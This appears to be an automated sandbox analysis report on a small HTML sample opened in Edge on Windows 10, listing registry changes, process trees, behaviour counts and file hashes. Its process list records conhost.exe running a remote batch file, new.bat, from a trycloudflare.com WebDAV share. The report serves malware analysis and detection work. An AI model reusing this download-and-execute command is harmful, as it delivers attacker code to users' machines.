Analysis
-
max time kernel
517s -
max time network
534s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28-06-2024 11:33
Static task
static1
Behavioral task
behavioral1
Sample
.html
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
.html
Resource
win10v2004-20240508-en
General
-
Target
.html
-
Size
2KB
-
MD5
7cdc8f61fb1fc3883598588051cdbe0a
-
SHA1
92e76e7557196531dbdf862421178ecaf4e248e2
-
SHA256
6e6856c0003a452f331ac9f2c7d73c28ca0d1924763b43544dfa1a65cc92b68d
-
SHA512
0a74b11895cc550b98c0ae6b89afc1eb564920bc519ecbdc75a985d485f876f8ffa86afae021c1569c7767c6d4362a3e7acb4df3d373ffaf2bbe872c4d158309
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 36 IoCs
Processes:
msedge.exeOpenWith.exemsedge.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" msedge.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exepid process 1100 msedge.exe 1100 msedge.exe 640 msedge.exe 640 msedge.exe 3512 identity_helper.exe 3512 identity_helper.exe 852 msedge.exe 852 msedge.exe 2836 msedge.exe 2836 msedge.exe 2776 msedge.exe 2776 msedge.exe 2776 msedge.exe 2776 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
msedge.exepid process 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
Processes:
msedge.exepid process 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe 1100 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
msedge.exeOpenWith.exepid process 852 msedge.exe 1996 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1100 wrote to memory of 2708 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 2708 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 3248 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 640 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 640 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe PID 1100 wrote to memory of 1360 1100 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa82fd46f8,0x7ffa82fd4708,0x7ffa82fd47182⤵PID:2708
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:22⤵PID:3248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:640 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2504 /prefetch:82⤵PID:1360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2880 /prefetch:12⤵PID:408
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2900 /prefetch:12⤵PID:3116
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:82⤵PID:1072
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3512 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:12⤵PID:4120
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:12⤵PID:3244
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:12⤵PID:848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5560 /prefetch:82⤵PID:208
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4188 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:852 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:12⤵PID:3872
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:4852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2256 /prefetch:12⤵PID:3424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2836 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5368 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2776
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5100
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2300
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1996
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1380
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" --headless \\flu-survival-educational-nba.trycloudflare.com@SSL\DavWWWRoot\new.bat1⤵PID:3312
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" --headless \\flu-survival-educational-nba.trycloudflare.com@SSL\DavWWWRoot\new.bat1⤵PID:1452
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" --headless \\flu-survival-educational-nba.trycloudflare.com@SSL\DavWWWRoot\new.bat1⤵PID:316
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD54b4f91fa1b362ba5341ecb2836438dea
SHA19561f5aabed742404d455da735259a2c6781fa07
SHA256d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c
SHA512fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac
-
Filesize
152B
MD5eaa3db555ab5bc0cb364826204aad3f0
SHA1a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca
SHA256ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b
SHA512e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1cf18b7c-d77d-4ccb-a6df-a32022003536.tmp
Filesize6KB
MD57addb8da5a1841a541dff1fb647f2419
SHA16fc7ffcc7d7018c57f3627ded53a9ecfbe4529be
SHA2561833d9b2b16feed8bd636c825fd2d37e6c44b7ec834446035e332d7375ed7b9e
SHA51295b5fef74963813f814be47a415e4f388e986bb8187bd914bae117ca3c99f00b65b741f319816162b2e17de3a5e5eef2a7714815c05eeb7a86f04a8e637756c1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize72B
MD5a6cd20596db4612eaa07fdb213951691
SHA1ea30cdb51722ff1586b234d208dab65eb101bd53
SHA2567b67b7fd029225ff5ec991e7fdf178cc8a613aeb4c845e61107fe41273634e1a
SHA5121c52da03ad104e34d359b288e635daf8891714d13d23f2b3b2005c5708cf10869115747f42ad16c5fab00e63bdd9207c8331901730b1ed8b8d16213a7fcbd2de
-
Filesize
180B
MD500a455d9d155394bfb4b52258c97c5e5
SHA12761d0c955353e1982a588a3df78f2744cfaa9df
SHA25645a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA5129553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f
-
Filesize
6KB
MD54b3bd8ed94d37a6b72a08692b8d4a484
SHA18945ec4a766c70b4e5196880d16a0d4a24bda7e3
SHA25600aa0d48b1f541f28a0958ff29d63a95c2356c7132cb580141630ba48da1a000
